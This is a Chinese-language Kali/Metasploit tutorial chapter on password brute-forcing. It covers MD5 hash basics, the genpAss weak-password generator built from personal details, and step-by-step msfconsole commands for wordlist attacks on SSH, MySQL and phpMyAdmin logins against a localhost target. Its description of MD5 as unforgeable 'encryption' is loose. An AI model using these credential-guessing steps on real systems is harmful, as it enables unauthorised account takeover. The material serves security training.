渗透利器-kali工具 (第五章-3) Metasploit密码爆破模块
本文内容:
- 常见的加密方式
- 密码生成工具
- 查找爆破模块
- 实战密码爆破
使用MSF的爆破模块进行进一步"信息收集"。
1,常见的加密方式:
1.MD5加密:
常用的密码验证算法,用于操作系统登录认证。
例如:49ba59abbe56e057 [123456]
明文密码:
存在规律性
可破解性
对应性[撞库]
密文:
使用加密算法
唯一性
不可伪造性
不可逆性
常见的hash加密:
https://www.jianshu.com/p/0d53b9b5631e
https://cmd5.com/
在线工具箱:
https://tool.bugku.com/
2.验证hash值:
Windows自带工具验证hash值:
certutil /? 查看帮助
certutil -hashfile 1.jpg MD5 查看文件MD5值
作用:
1.验证文件是否损坏
2.验证文件是否被修改[后门]
案例:
https://www.freebuf.com/articles/paper/147403.html (新闻)
https://www.qianxin.com/other/CVE-2019-0708
2,密码生成工具-genpAss:
中国特色的弱口令生成器:
指令:
-n 命令
-u 用户名
-q QQ号
-e 邮箱
-m 手机号
-b 生日:格式:2001-01-01
-c 公司名
-o 导出文件
下载地址:https://github.com/RicterZ/genpAss
安全趣闻:https://www.freebuf.com/sectool/197414.html
案例:http://www.anquan.us/static/bugs/wooyun-2016-0197071.html
密码泄露查询:https://haveibeenpwned.com/Passwords
3,查找 爆破模块:
查找爆破模块的姿势:
查找关键字:login [search type:auxiliary login]
通过搜索功能快速找到我们想要的模块,缩小范围、精确定位。
查找服务名:search type:auxiliary name:ssh
查找服务名+关键字:search type:auxiliary name:phpmyadmin login
4,实战密码爆破:
通过"信息收集"进行针对性的密码爆破
1.SSH密码爆破:
使用模块名:auxiliary/scanner/ssh/ssh_login
1.查找模块: search type:auxiliary name:ssh
2.使用模块: use auxiliary/scanner/ssh/ssh_login
3.查看需设置选项:options [pass_file,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]
4.设置目标地址:set rhosts 地址[127.0.0.1]
5.设置用户名:set username root
6.设置字典:set pass_file /root/桌面/1.txt [文件路径+文件名称]
7.开始爆破:run
2.MySQL密码爆破:[显示详细结果]
使用模块名:auxiliary/scanner/mysql/mysql_login
1.查找模块:search type:auxiliary name:mysql
2.使用模块:use auxiliary/scanner/mysql/mysql_login
3.查看设置选项:options [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]
4.设置目标地址:set rhosts 地址 [127.0.0.1]
5.设置用户名:set username root
6.设置密码字典:set pass_file /root/桌面/1.txt [文件路径+文件名称]
7.开始爆破:run
3.phpadmin登录验证爆破:[显示详细结果]
使用模块名:auxiliary/scanner/http/phpmyadmin_login
1.查找模块:search type:auxiliary name:phpmyadmin
2.使用模块:use auxiliary/scanner/http/phpmyadmin_login
3.查看设置选项:options [pass_file,rport,rhosts,知道用户名使用USERNAME不知道用户名使用USERPASS_FILE]
4.设置目标地址:set rhosts 地址[127.0.0.1]
5.设置端口号:set rport 端口[8080]
6.设置目标范围:set targeturl phpAdmin/index.php
7.设置用户名:set username root
8.设置密码字典:set pass_file /root/桌面/1.txt
9.开始爆破:run